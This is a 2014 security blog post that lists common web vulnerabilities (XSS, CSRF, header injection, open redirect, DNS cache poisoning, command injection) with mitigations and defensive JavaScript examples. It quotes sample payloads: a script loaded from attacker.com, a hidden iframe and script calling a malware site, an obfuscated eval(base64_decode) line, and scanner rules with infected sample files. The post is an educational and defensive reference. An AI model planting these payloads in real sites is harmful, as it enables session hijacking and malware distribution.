<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>A List of Common Web Vulnerabilities</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="Marina von Steinkirch">
<!-- Le styles -->
<link rel="stylesheet" href="./theme/css/bootstrap.dark.css" type="text/css" />
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.tag-1 {
font-size: 13pt;
}
.tag-2 {
font-size: 11pt;
}
.tag-2 {
font-size: 10pt;
}
.tag-4 {
font-size: 8pt;
}
</style>
<link href="./theme/css/bootstrap-responsive.dark.css" rel="stylesheet">
<link href="./theme/css/font-awesome.css" rel="stylesheet">
<link href="./theme/css/pygments.css" rel="stylesheet">
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="./theme/images/favicon.ico">
<link rel="apple-touch-icon" href="./theme/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="./theme/images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="./theme/images/apple-touch-icon-114x114.png">
<link href="./feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="chmod +x singularity.sh ATOM Feed" />
</head>
<body>
<div class="container-fluid">
<div class="row">
<div class="span9" id="content">
<section id="content">
<article>
<header>
<h1>
<a href=""
rel="bookmark"
title="Permalink to A List of Common Web Vulnerabilities">
A List of Common Web Vulnerabilities
</a>
</h1>
</header>
<div class="entry-content">
<div class="well">
<footer class="post-info">
<abbr class="published" title="2014-10-31T06:30:00">
Fri 31 October 2014 </abbr>
<span class="label"> Category</span>
<a href="./category/web-security.html"><i class="icon-folder-open"></i>Web Security</a>
<span class="label">Tags</span>
<a href="./tag/xss.html"><i class="icon-tag"></i>XSS</a>
<a href="./tag/csrf.html"><i class="icon-tag"></i>CSRF</a>
<a href="./tag/xssi.html"><i class="icon-tag"></i>XSSI</a>
<a href="./tag/buffer_overflow.html"><i class="icon-tag"></i>Buffer_Overflow</a>
<a href="./tag/lfi.html"><i class="icon-tag"></i>LFI</a>
<a href="./tag/rfi.html"><i class="icon-tag"></i>RFI</a>
<a href="./tag/iframe.html"><i class="icon-tag"></i>iframe</a>
<a href="./tag/sqli.html"><i class="icon-tag"></i>SQLi</a>
</footer><!-- /.post-info --> </div>
<p>Although nomenclatures don't help much when you are facing a security problem, I am keeping this list for a systematic organization. It is constantly being updated.</p>
<p>In addition to this list, you can check some older posts on specific web explorations: <a href="http://bt3gl.github.io/exploiting-the-web-in-20-lessons-natas.html">Exploiting the web in 20 lessons</a> and <a href="http://bt3gl.github.io/exploring-d-ctf-quals-2014s-exploits.html">D-Camp CTF 2014</a>.</p>
<h1>Vulnerabilities to Web Applications</h1>
<h2>Cross-site Scripting (XSS)</h2>
<p>XSS is caused by <strong>insufficient input validation or output escaping</strong>. This can allow an attacker to insert HTML markup or scripts in a vulnerable website. The injected code will have plenty of access in this site, and in many cases, to the HTTP cookies stored by the client.</p>
<p>HTML has five characters that are reserved:</p>
<ul>
<li>
<p><strong>both angle brackets</strong>,</p>
</li>
<li>
<p><strong>single and double quotes</strong>,</p>
</li>
<li>
<p>and <strong>ampersand</strong>.</p>
</li>
</ul>
<p>The ampersand should never appear literally in most HTML sections. Both angle brackets should not be used inside a tag unless properly quoted. Quote characters can be a problem inside a tag but are harmless in text.</p>
<p>To allow these characters to appear in problematic locations, an ampersand-prefixed, semicolon-terminated encoding scheme is used: <a href="http://www.w3schools.com/html/html_entities.asp">entity encoding</a>.</p>
<h3>Non-Persistent Attack:</h3>
<p>Non-persistent XSS attacks consist of getting users to click a link that carries the attacker's script. A typical scenario is the following:</p>
<ol>
<li>The target website performs query searches that are not sanitized. For example, the query could accept scripts in it. A simple way to check for this vulnerability is to verify whether an alert box with the message <strong>Pwnd</strong> is displayed:</li>
</ol>
<div class="highlight"><pre><span class="nx">http</span><span class="p">:</span><span class="c1">//website.org?q=&lt;script%20type='text/javascript'&gt;alert('Pwnd!');&lt;/script&gt;</span>
</pre></div>
<ol start="2">
<li>The attacker crafts an exploit script that gets the victim's authorization information (for example, from an <strong>Authorization Cookie</strong>). The attacker sends a <strong>phishing email</strong> to the victim containing a link that carries a script, such as:</li>
</ol>
<div class="highlight"><pre><span class="nl">http:</span><span class="c1">//website.org?q=puppies&lt;script%20src="http://attacker.com/exploit.js"&gt;</span>
</pre></div>
<ol start="3">
<li>If the victim clicks on the link, her/his browser runs the script (legitimate under the <strong>Same Origin Policy</strong>, <em>i.e.</em>, resources are shared between origins with the same protocol, domain and port). The attacker now has control of the victim's identity on that website. If the victim is the administrator, it is game over.</li>
</ol>
<h3>Persistent Attack:</h3>
<p>Persistent XSS attacks store a malicious script in the website's database, from which it will be retrieved by other users. A typical scenario is the following:</p>
<ol>
<li>
<p>The attacker verifies that the target website has a stored XSS vulnerability (for example, allowing her/him to post text with HTML tags).</p>
</li>
<li>
<p>The attacker creates an account in the target website and posts something with a hidden script (similar to the one above).</p>
</li>
<li>
<p>When anyone loads the page with that post, the script runs, and the attacker is able to hijack the victim's session.</p>
</li>
</ol>
<p>Additionally, with <em>password managers</em>, there is a risk of amplification of XSS bugs. In web applications that use <em><a href="https://www.owasp.org/index.php/HttpOnly">httponly</a></em> cookies, a successful exploitation of an XSS flaw may give the attacker transient access to the user's account (and password).</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li>
<p>Servers should use the <strong>Content Security Policy</strong> (CSP) HTTP header, which allows whitelisting the sources of content. For instance, the <em>Content-Security-Policy</em> header disables inline JavaScript by default.</p>
</li>
<li>
<p>Servers can set the <strong>HttpOnly</strong> flag on a cookie (in the <em>Set-Cookie</em> HTTP header), which makes the cookie unavailable to client-side scripts.</p>
</li>
<li>
<p>Search inputs should <em>always</em> be sanitized on both the server side and the client side.</p>
</li>
<li>
<p>Servers should redirect invalid requests.</p>
</li>
<li>
<p>Servers should invalidate sessions from different IP addresses. However, this can be circumvented if the attacker is behind a web proxy or behind the same NAT IP.</p>
</li>
<li>
<p>Clients should disable scripts by default (for example with <a href="https://addons.mozilla.org/en-us/firefox/addon/noscript/">NoScript</a>).</p>
</li>
</ul>
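<p>As an added example (not code from the original post), the search page from the non-persistent scenario rendered twice: once echoing the query verbatim and once with entity encoding applied to the five reserved characters. The handler names, the <code>/search</code> route and the sample queries are assumptions made for the illustration.</p>

```javascript
// Added example: the same search page, vulnerable vs. entity-encoded output.
// Handler names, the /search route and the sample inputs are hypothetical.

// The five reserved HTML characters and their entities.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// One pass over the input, so the '&' emitted for one character is never
// re-encoded by a later replacement.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// VULNERABLE: the query is echoed verbatim into an attribute and into text.
function renderSearchVulnerable(q) {
  return `<form><input name="q" value="${q}"></form>\n` +
         `<p>Results for ${q}</p>`;
}

// HARDENED: every interpolation is entity-encoded. The query placed in the
// link is percent-encoded first (URL context) and then entity-encoded
// (attribute context), which also turns the literal '&' into '&amp;'.
function renderSearchEscaped(q) {
  const safe = escapeHtml(q);
  const next = escapeHtml(`/search?q=${encodeURIComponent(q)}&page=2`);
  return `<form><input name="q" value="${safe}"></form>\n` +
         `<p>Results for ${safe}</p>\n` +
         `<a href="${next}">next page</a>`;
}

// The probe from the scenario above, plus a constructed benign query whose
// quotes and ampersand would still break the attribute if left unescaped.
const SCRIPT_PAYLOAD = "<script type='text/javascript'>alert('Pwnd!');</script>";
const QUOTED_QUERY = 'cats & "dogs"';

console.log(renderSearchVulnerable(SCRIPT_PAYLOAD));
console.log(renderSearchEscaped(SCRIPT_PAYLOAD));
console.log(renderSearchEscaped(QUOTED_QUERY));
```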
<hr />
<h2>Cross-site Script Inclusion (XSSI)</h2>
<p>XSSI comes from the failure to secure sensitive JSON-like responses against being loaded on third-party sites via <code>&lt;script src=..&gt;</code>, leaking user-specific information in the response. It is a risk whenever ambient authority credentials (such as cookies) are used by the server to generate user-specific JavaScript code.</p>
<p>For instance, JSON is a JavaScript syntax structure to keep in-place object serialization. The curly bracket <strong>{</strong> is assumed to be the beginning of the object. Overloading curly brackets means that JSON blocks will not be recognized properly in standalone statements.</p>
<hr />
<h2>Cross-site Request Forgery (CSRF, XSRF)</h2>
<p>CSRF allows attackers to execute actions using the credentials of another user without that user's knowledge or consent. It is the failure to verify that a particular state-changing HTTP request received by the <strong>server-side</strong> portion of the application was initiated from the expected <strong>client-side</strong> origin. Any third-party website loaded in the browser can perform actions on behalf of the victim.</p>
<p>On cross-domain navigation, the browser includes any ambient credentials. To the server, a request originating from its own client-side code will appear the same as a request from a rogue third-party site, and it might be granted the same privilege.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>
<p>Any two windows with frames opened in a browser will remain <strong>Same Origin</strong> with each other even if the user logs out of one account, which permits a third party to submit a username and password and log in to an attacker-controlled account. For example, the attacker can open and keep a frame pointing to a sensitive page and then log the victim into the attacker-controlled account to execute some code injection. Despite the change of HTTP credentials, the injected code will be able to access the previously loaded frame.</p>
</li>
<li>
<p>In several home network routers, CSRF can permit attackers to access the device and intercept or modify the network traffic.</p>
</li>
</ul>
<h3>Attempts of mitigation:</h3>
<ul>
<li>
<p>Checking a nonce in each POST request (so that a form POST cannot be replayed).</p>
</li>
<li>
<p>Including a secret user- and session-specific value in the requests (as an additional query parameter or a hidden field). The attacker will not be able to read the value since access to cross-domain documents is restricted by the <strong>same-origin</strong> policy.</p>
</li>
</ul>
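<p>Both mitigations combined in one added example (not code from the original post): a session-bound secret placed in a hidden form field and consumed as a single-use nonce on POST. The in-memory session store, the <code>/transfer</code> form and the field name <code>csrf_token</code> are assumptions made for the illustration.</p>

```javascript
// Added example: per-session, single-use anti-CSRF token in a hidden field.
// The session store, form action and field name are hypothetical.

// Web Crypto is a global in browsers and current Node.js; older Node.js
// releases expose the same object through node:crypto.
const webcrypto = globalThis.crypto || require('node:crypto').webcrypto;

// Server-side state: sessionId -> Set of tokens issued and not yet used.
const outstandingTokens = new Map();

function randomToken(bytes = 32) {
  const buf = new Uint8Array(bytes);
  webcrypto.getRandomValues(buf);
  return Array.from(buf, (b) => b.toString(16).padStart(2, '0')).join('');
}

// Comparison whose running time does not depend on where the strings differ.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Called while rendering a form for an authenticated session.
function issueToken(sessionId) {
  const token = randomToken();
  if (!outstandingTokens.has(sessionId)) outstandingTokens.set(sessionId, new Set());
  outstandingTokens.get(sessionId).add(token);
  return token;
}

// The token is hex, so it needs no further escaping inside the attribute.
function renderTransferForm(sessionId) {
  return '<form method="POST" action="/transfer">' +
         `<input type="hidden" name="csrf_token" value="${issueToken(sessionId)}">` +
         '<input name="amount"><button>Send</button></form>';
}

// Called before any state-changing POST is processed. The cookie identifies
// the session (ambient credential); the body must carry the matching secret.
function checkPost(sessionId, body) {
  const submitted = typeof body.csrf_token === 'string' ? body.csrf_token : '';
  const tokens = outstandingTokens.get(sessionId);
  if (!tokens) return false;
  for (const token of tokens) {
    if (constantTimeEqual(token, submitted)) {
      tokens.delete(token); // single use: a replayed POST is rejected
      return true;
    }
  }
  return false;
}
```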
<hr />
<h2>Header Injection (Response Splitting)</h2>
<p>Insufficient escaping of newlines in HTTP responses generated on the server side. This can lead to XSS or proxy cache poisoning.</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li>LF and CR characters must be stripped from any attacker-controlled values in the HTTP headers.</li>
</ul>
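<p>An added example (not code from the original post) of why both characters have to go: the same redirect is serialized with and without stripping, and a lenient header parser shows what a client or proxy would see. The <code>lang</code> parameter, the <code>X-Injected</code> header and the function names are constructed for the illustration.</p>

```javascript
// Added example: response splitting through an unfiltered header value.
// Function names, the lang parameter and the sample inputs are hypothetical.

// Serialize a response head the way a minimal server would.
function serializeHead(statusLine, headers) {
  const lines = headers.map(([name, value]) => `${name}: ${value}`);
  return [statusLine, ...lines].join('\r\n') + '\r\n\r\n';
}

// What a lenient receiver sees: many parsers accept a bare LF as a line
// ending, which is why CR and LF both have to be removed.
function headerNames(rawHead) {
  const head = rawHead.split(/\r?\n\r?\n/)[0];
  return head.split(/\r?\n/).slice(1).map((l) => l.slice(0, l.indexOf(':')));
}

function stripCrLf(value) {
  return String(value).replace(/[\r\n]/g, '');
}

// VULNERABLE: the request parameter is copied into the Location header as is.
function languageRedirectVulnerable(lang) {
  return serializeHead('HTTP/1.1 302 Found', [
    ['Location', `/home?lang=${lang}`],
    ['Content-Length', '0'],
  ]);
}

// HARDENED: CR and LF are stripped from the attacker-controlled value.
function languageRedirectStripped(lang) {
  return serializeHead('HTTP/1.1 302 Found', [
    ['Location', `/home?lang=${stripCrLf(lang)}`],
    ['Content-Length', '0'],
  ]);
}

// Constructed inputs: one with CRLF, one with a bare LF.
const TAINTED_CRLF = 'en\r\nX-Injected: 1';
const TAINTED_LF = 'en\nX-Injected: 1';

console.log(headerNames(languageRedirectVulnerable(TAINTED_CRLF)));
console.log(headerNames(languageRedirectStripped(TAINTED_CRLF)));
```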
<hr />
<h2>Mixed Content</h2>
<p>Loading non-HTTPS sub-resources on HTTPS pages undoes most of the benefits of encryption. For scripts and applets, this makes the application vulnerable to active attackers, especially in open wireless networks.</p>
<hr />
<h2>Open Redirection</h2>
<p>Applications that perform HTTP- or script-based requests to user-supplied URLs without constraining the possible destinations in any meaningful way, leading, for example, to XSS.</p>
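<p>One way to constrain the destinations, as an added example (not code from the original post): resolve the user-supplied value the way a browser would and accept it only if the resulting origin is on an allowlist. The origins <code>https://app.example</code> and <code>https://help.app.example</code> and the function name are assumptions made for the illustration.</p>

```javascript
// Added example: constraining a user-supplied redirect target.
// The origins and the function name are hypothetical.
const APP_ORIGIN = 'https://app.example';
const ALLOWED_ORIGINS = new Set([APP_ORIGIN, 'https://help.app.example']);
const FALLBACK = '/';

function resolveRedirect(next) {
  let url;
  try {
    // Parse with the same WHATWG rules the browser applies, relative to our
    // own origin, so "//host", "/\host" and absolute URLs are all resolved
    // before any decision is made.
    url = new URL(String(next), APP_ORIGIN);
  } catch {
    return FALLBACK;
  }
  // Scheme check rejects javascript:, data: and plain http: targets.
  if (url.protocol !== 'https:') return FALLBACK;
  // Compare whole origins, never substrings or prefixes of the raw input.
  if (!ALLOWED_ORIGINS.has(url.origin)) return FALLBACK;
  // Userinfo is never needed and is easy to misread ("trusted@other-host").
  if (url.username || url.password) return FALLBACK;
  // Same-origin targets are re-emitted as a path so the host cannot change.
  return url.origin === APP_ORIGIN
    ? url.pathname + url.search + url.hash
    : url.href;
}

// Constructed inputs covering the usual ways a destination check is missed.
const SAMPLES = [
  '/account?tab=1',
  'https://help.app.example/faq',
  '//attacker.example/x',
  '/\\attacker.example',
  'https://app.example@attacker.example/',
  'http://app.example/',
  'javascript:void(0)',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', resolveRedirect(s));
```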
<hr />
<h2>Referer Leakage</h2>
<p>HTTP requests may include a <em>Referer</em> header that contains the URL of the document that triggered the current navigation in some way. The header may also reveal some information about the user's browsing habits, such as query parameters in the referring page.</p>
<p>This vulnerability is created by the disclosure of a sensitive URL when embedding an off-site sub-resource or providing an off-site link. Any security data encoded in the URL of the parent document will be leaked in the <em>Referer</em> header.</p>
<hr />
<h1>Vulnerabilities to Web Application Design</h1>
<h2>Cache Poisoning</h2>
<p>Long-term pollution of the browser cache (or any proxy within) with a malicious version of the targeted web application. Encrypted web applications may be targeted due to response-splitting vulnerabilities. In non-encrypted traffic, network attackers may be able to modify responses too.</p>
<hr />
<h2>Clickjacking</h2>
<p>The act of obscuring a portion of a web application so that the victim is not aware that individual clicks are delivered to another site. For example, a malicious site wraps another site in a frame.</p>
<p>If a website includes an iframe, it may be possible to find it with a SQL query that searches for iframe code. For example:</p>
<div class="highlight"><pre><span class="n">SELECT</span> <span class="o">*</span> <span class="n">FROM</span> <span class="n">blog_posts</span> <span class="n">WHERE</span> <span class="n">post_text</span> <span class="n">LIKE</span> <span class="err">'</span><span class="o">%></span><span class="n">iframe</span><span class="o">%</span><span class="err">'</span><span class="p">;</span>
</pre></div>
<hr />
<h2>Content and Character Set Sniffing</h2>
<p>Possibility that the browser will ignore any authoritative content type or character set information provided by the server and interpret the returned document incorrectly.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>Scenarios where <a href="http://www.w3.org/Protocols/rfc1341/4_Content-Type.html">Content-Type</a> is ignored.</li>
</ul>
<hr />
<h2>Cookie Forcing/Injection</h2>
<p>Possibility of blindly injecting HTTP cookies into the context of an otherwise impenetrable web application due to issues in how the mechanism is designed and implemented in browsers. This is of special concern for HTTPS applications.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>Cookie stuffing: deleting cookies belonging to other applications by overflowing the cookie jar.</li>
</ul>
<hr />
<h2>Denial-of-Service (DoS)</h2>
<p>Any opportunity for the attacker to bring down a browser or server, or to make the use of a targeted application more difficult.</p>
<h3>DoS and amplification attacks</h3>
<p>DNS resolvers are attractive targets to attackers who exploit the resolvers' large response-to-request size ratio to gain additional free bandwidth. Resolvers that support EDNS0 (Extension Mechanisms for DNS) are especially vulnerable because of the substantially larger packet size that they can return.</p>
<h3>Examples of exploitation:</h3>
<p>In an amplification scenario, the attack proceeds as follows:</p>
<ul>
<li>The attacker sends a victim DNS server queries using a forged source IP address. The queries may be sent from a single system or a network of systems all using the same forged IP address. The queries are for records that the attacker knows will result in much larger responses, up to several dozen times the size of the original queries.</li>
<li>The victim server sends the large responses to the source IP address passed in the forged requests, overwhelming the system and causing a DoS situation.</li>
</ul>
<hr />
<h2>Framebusting</h2>
<p>The possibility of a framed page navigating the top-level document to a new URL without having to satisfy <strong>same-origin</strong> checks. It might be exploited for phishing.</p>
<hr />
<h2>HTTP Downgrade</h2>
<p>Ability of an attacker to prevent the user from reaching an HTTPS version of a site or to downgrade an existing HTTPS session to HTTP.</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li><a href="http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">Strict transport security</a>: The approach allows any site to instruct the browser that all future requests made to a particular hostname or domain should always use HTTPS and that any HTTP traffic should be automatically upgraded and submitted over HTTPS.</li>
</ul>
<hr />
<h2>Network Fenceposts</h2>
<p>When websites let the browser interact with destinations not directly accessible to the attacker, for example, with the systems on a victim's internal networks. This attack can be performed with the help of <a href="http://en.wikipedia.org/wiki/DNS_rebinding">DNS rebinding</a>.</p>
<h3>Attempts of mitigation:</h3>
<ul>
<li>Internet Explorer implements the zone model, a potential approach to the risk.</li>
</ul>
<hr />
<h1>Vulnerabilities in the Server-Side</h1>
<h2>Buffer Overflow</h2>
<p>In low-level languages such as C or C++, buffer overflow happens when a program allows more information to be stored in a particular memory region than there is space to accommodate the incoming data, leading to the unexpected overwrite of other vital data structures.</p>
<hr />
<h2>Command Injection (SQL, PHP, Shellcode)</h2>
<p>Due to insufficient input filtering or output escaping, attacker-controlled strings may be processed as statements in an interpreted language used by the application.</p>
<h3>Examples of exploitation:</h3>
<ul>
<li>Malicious code injections in an iframe to the attack site:</li>
</ul>
<div class="highlight"><pre><span class="nt">&lt;iframe</span> <span class="na">frameborder=</span><span class="s">"0"</span> <span class="na">height=</span><span class="s">"0"</span> <span class="na">src=</span><span class="s">"http://&lt;attack-site&gt;/path/file"</span> <span class="na">style=</span><span class="s">"display:none"</span> <span class="na">width=</span><span class="s">"0"</span><span class="nt">&gt;&lt;/iframe&gt;</span>
</pre></div>
<ul>
<li>JavaScript or another scripting language that calls and runs scripts from an attack site:</li>
</ul>
<div class="highlight"><pre><span class="nt">&lt;script</span> <span class="na">type=</span><span class="s">'text/javascript'</span> <span class="na">src=</span><span class="s">'http://malware-attack-site/js/x55.js'</span><span class="nt">&gt;&lt;/script&gt;</span>
</pre></div>
<ul>
<li>Scripts that redirect the browser to an attack site:</li>
</ul>
<div class="highlight"><pre><span class="nt">&lt;script&gt;</span>
if (document.referrer.match(/google\.com/)) {
window.location("http://malware-attack-site/");
}
<span class="nt">&lt;/script&gt;</span>
</pre></div>
<ul>
<li>Malicious code that is obfuscated to avoid detection:</li>
</ul>
<div class="highlight"><pre><span class="n">eval</span><span class="p">(</span><span class="n">base64_decode</span><span class="p">(</span><span class="s">"aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"</span><span class="p">));</span>
</pre></div>
<ul>
<li>Shared object files designed to randomly write harmful code to otherwise benign scripts:</li>
</ul>
<div class="highlight"><pre><span class="cp">#httpd.conf modified by the hacker</span>
<span class="n">LoadModule</span> <span class="n">harmful_module</span> <span class="n">modules</span><span class="o">/</span><span class="n">mod_harmful</span><span class="p">.</span><span class="n">so</span>
<span class="n">AddModule</span> <span class="n">mod_harmful</span><span class="p">.</span><span class="n">c</span>
</pre></div>
<ul>
<li>The <strong>Error template type of malware infection</strong> occurs when the template used for error messages, such as 404 File not Found, is configured to distribute malware. In this way, attackers can launch attacks on URLs that do not even exist on the victim's website.</li>
</ul>
<h3>Attempts of mitigation:</h3>
<ul>
<li>Investigate all possible harmful code on the website. It may be helpful to search for words like "iframe" to find iframe code. Other helpful keywords are "script", "eval", and "unescape". For example, on Unix-based systems:</li>
</ul>
<div class="highlight"><pre><span class="nv">$ </span>grep -irn <span class="s2">"iframe"</span> ./ | less
</pre></div>
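<p>The keyword search can be narrowed to the infection patterns listed above. The following added example (not code from the original post) runs four such rules over constructed file contents; the file names, the site host <code>www.example.org</code> and the list of expected Apache modules are assumptions made for the illustration.</p>

```javascript
// Added example: triage rules for the infection patterns listed above.
// File contents are constructed; OWN_HOSTS and KNOWN_MODULES are assumptions.
const OWN_HOSTS = new Set(['www.example.org']);
const KNOWN_MODULES = new Set(['rewrite_module', 'ssl_module']);

const RULES = [
  { // iframe that is hidden or has zero size
    id: 'hidden-iframe',
    test: (line) =>
      /<iframe\b[^>]*(?:display\s*:\s*none|\b(?:height|width)\s*=\s*["']?0\b)/i.test(line),
  },
  { // script loaded from a host the site does not own
    id: 'remote-script',
    test: (line) => {
      const m = /<script\b[^>]*\bsrc\s*=\s*["']?(?:https?:)?\/\/([^"'\s>\/]+)/i.exec(line);
      return m !== null && !OWN_HOSTS.has(m[1].toLowerCase());
    },
  },
  { // eval() applied directly to a decoder call
    id: 'eval-decode',
    test: (line) => /\beval\s*\(\s*(?:base64_decode|unescape)\s*\(/i.test(line),
  },
  { // Apache module that is not on the expected list
    id: 'unknown-module',
    test: (line) => {
      const m = /^\s*LoadModule\s+(\S+)/i.exec(line);
      return m !== null && !KNOWN_MODULES.has(m[1]);
    },
  },
];

// Returns "file:line:rule" strings, one per match, in file and line order.
function scan(files) {
  const findings = [];
  for (const [name, content] of Object.entries(files)) {
    content.split('\n').forEach((line, i) => {
      for (const rule of RULES) {
        if (rule.test(line)) findings.push(`${name}:${i + 1}:${rule.id}`);
      }
    });
  }
  return findings;
}

// Constructed sample site: each file mixes legitimate and suspicious lines.
const SAMPLE_FILES = {
  'index.html': [
    '<script src="/js/app.js"></script>',
    '<script src="https://www.example.org/js/menu.js"></script>',
    '<iframe src="/map.html" width="600" height="400"></iframe>',
    '<iframe frameborder="0" height="0" src="http://attack-site.example/path/file" style="display:none" width="0"></iframe>',
  ].join('\n'),
  'about.html': "<p>About</p>\n<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>",
  'footer.php': '<?php\neval(base64_decode("Y29uc3RydWN0ZWQ="));\n?>',
  'httpd.conf': 'LoadModule rewrite_module modules/mod_rewrite.so\nLoadModule harmful_module modules/mod_harmful.so',
};

console.log(scan(SAMPLE_FILES).join('\n'));
```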
<hr />
<h2>Directory Traversal</h2>
<p>Due to insufficient filtering (such as the failure to recognize <code>../</code> segments) an application can be tricked into reading or writing files at arbitrary locations. Unconstrained file-writing bugs can be exploitable to run attacker-supplied code.</p>
<hr />
<h2>File Inclusion</h2>
<p>If used without a qualifier or prefixed with <em>local</em> (LFI), the term is synonymous with read-related directory traversal. Remote file inclusion (RFI) is an alternative way to exploit file-inclusion vulnerabilities by specifying a URL rather than a valid file path. In some languages, a common API opens local files and fetches remote URLs, which might provide the ability to retrieve the attacker's files.</p>
<hr />
<h2>Format String Vulnerability</h2>
<p>Several libraries accept templates (format strings) followed by a set of parameters that the function is expected to insert into the template at predefined locations. For example, C has functions such as <em>printf</em>, <em>syslog</em>, etc. The vulnerability is caused by permitting attackers to supply the template to one of these functions. This can lead to data leaks and code execution.</p>
<hr />
<h2>Integer Overflow</h2>
<p>Vulnerability specific to languages with no range checking. The flaw is caused by the developer failing to detect that an integer exceeded the maximum possible value and rolled back to zero, to a large negative integer, or to some hardware-specific result.</p>
<p>Integer underflow is the opposite effect: crossing the minimum value and rolling over to a very large positive integer.</p>
<hr />
<h2>Pointer Management Vulnerabilities</h2>
<p>In languages that use raw memory pointers such as C or C++, it is possible to use pointers that are either uninitialized or no longer valid (dangling). These vulnerabilities will corrupt the internal state of the program and allow an attacker to execute attacker-supplied code.</p>
<hr />
<h2>Cache poisoning attacks</h2>
<p>Several variants of DNS spoofing attacks that can result in cache poisoning.</p>
<h3>Example of Attack</h3>
<ol>
<li>
<p>The attacker sends a target DNS resolver multiple queries for a domain name for which she/he knows the server is not authoritative, and that is unlikely to be in the server's cache.</p>
</li>
<li>
<p>The resolver sends out requests to other nameservers (whose IP addresses the attacker can also predict).</p>
</li>
<li>
<p>In the meantime, the attacker floods the victim server with forged responses that appear to originate from the delegated nameserver. The responses contain records that ultimately resolve the requested domain to IP addresses controlled by the attacker. They might contain answer records for the resolved name or, worse, they may further delegate authority to a nameserver owned by the attacker, so that s/he takes control of an entire zone.</p>
</li>
<li>
<p>If one of the forged responses matches the resolver's request (for example, by query name, type, ID and resolver source port) and is received before a response from the genuine nameserver, the resolver accepts the forged response and caches it, and discards the genuine response.</p>
</li>
<li>
<p>Future queries for the compromised domain or zone are answered with the forged DNS resolutions from the cache. If the attacker has specified a very long time-to-live on the forged response, the forged records stay in the cache for as long as possible without being refreshed.</p>
</li>
</ol>
<hr />
<h1>References:</h1>
<ul>
<li><a href="http://www.amazon.com/The-Tangled-Web-Securing-Applications/dp/1593273886">The Tangled Web</a></li>
<li><a href="https://docs.djangoproject.com/en/dev/topics/security/">Django Security</a></li>
<li><a href="https://docs.djangoproject.com/en/dev/topics/security/">Bleach: Sanitizing Tool in Python</a></li>
<li><a href="https://developers.google.com/speed/public-dns/docs/security">Google's Public DNS</a></li>
</ul>
</div><!-- /.entry-content -->
</article>
</section>
</div><!--/span-->
</div><!--/row-->
<footer>
<address id="about">
</address><!-- /#about -->
</footer>
</div><!--/.fluid-container-->
<script src="./theme/js/jquery-1.7.2.min.js"></script>
<script src="./theme/js/bootstrap.min.js"></script>
</body>
</html>